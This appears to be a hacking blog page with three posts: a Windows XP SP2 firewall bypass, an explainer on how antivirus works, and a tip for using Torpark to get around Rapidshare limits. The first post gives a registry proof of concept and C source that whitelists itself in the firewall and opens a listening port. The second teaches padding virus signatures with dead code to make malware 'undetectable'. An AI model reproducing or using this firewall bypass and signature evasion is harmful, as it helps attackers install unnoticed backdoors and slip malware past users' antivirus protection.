How to Bypass Windows XP Firewall

How to Bypass Windows XP Firewall using C program.

Hello Friends, today i will share with you the technique using which we can bypass windows-xp service pack-2 firewall. Its a 100% working hack and its basically an exploit in windows XP.

This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.

Vulnerable Systems :-
* Microsoft Windows XP SP2

Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*>
#include <*ezsocket.h*>
#include <*conio.h*>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */

Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

How does Antivirus software works or detects virus

Hello friends, today i will explain you all how an anti-virus software works and detects virus. Most of you already know that what is anti-virus, but have you ever tried to understand how it works and why it requires updates regularly? How anti-virus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of anti-virus involves two basic technologies namely:

1. Dictionary based continuous and fragmented string search

2. Suspicious activity detection (process manipulation)

How does anti-virus software works

So friends, lets start learning how an anti-virus works and detects virus and then eliminates and heals them.

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, anti-virus software searches a string by comparing the file with strings existing in virus definition's or database.

 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:

ABCDEFGHIJKLMNOPQRSTUVWXYZ

Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behavior of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:

ABCDEFGHIJKLMNOPQRSTUVWXYZ012345

where 012345 is the string that virus has attached to the file after infection.

Now what does anti-virus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.

Note: This all processing is done on binary format of codes and sometimes executable. 

Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:

0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the anti-virus database so it is not detected by anti-virus.

How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.

Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why anti-virus needs updates regularly. Anti-virus companies daily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:

1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.

2. Most tools available are already infected with key-loggers and spy Trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:

The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that anti-virus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then anti-virus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 

The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your anti-virus suggests.

Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with Trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains back-doors that make your system open for attack similar to the way you have left your house main gate open for thieves in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted free wares as alternatives for paid tools rather than using their cracked versions...

Browse anonymously using Torpark Browser – For downloading multiple files Rapidshare Hackin

I have posted about Skipping or Bypassing Rapidshare or Megaupload, hotfile waiting time.

In this post I have a new Rapidshare hacking tip for you. Well, you might be aware of Browsers like Firefox, or Internet Explorer. I would like to introduce you to a browser known as Torpark Browser, which works as a anonymous web browser. It is like a proxy browser where you can change your permanent IP Address  to dynamic IP Address. So, when ever you run this browser you get a new IP address.  Now download mutliple files at the same time. Yes you read it right, you can download multiple rapidshare files or megaupload, hotfile files at the same time. You can even skip or bypass the time limit on downloading files. The most amazing thing is IDM works with this browser.
Note: You need to close the browser window after each download coz it will reset the ip address.
download
Description of Torpark Browser:

As a way of avoiding spyware and pop-ups, Torpark successfully allows you to surf the Web anonymously, although the publisher warns of possible connection slowdowns.
The self-extracting file installs quickly, and you can run it from your hard drive, or as the publisher suggests, from a jump drive. Torpark adds to your browser’s toolbar a few unobtrusive buttons, which allow you to activate/deactivate the tool and configure its privacy settings according to your specifications. The tool effectively restricts pop-ups; blocks surreptitious installations of adware, spyware, and cookies; and hides any traces of your surfing. You can check the Torpark Tools menu while visiting a site and build a list of blocked items for the current page; from the same list box, you may add to a white list any or all of the displayed items.
The publisher cautions that using Torpark may slow your Internet connection speed, particularly if you’re using a dial-up, but we noticed no slowdown during our tests. Torpark is free, easy to use, and suitable for all users interested in protecting their privacy while visiting Web sites.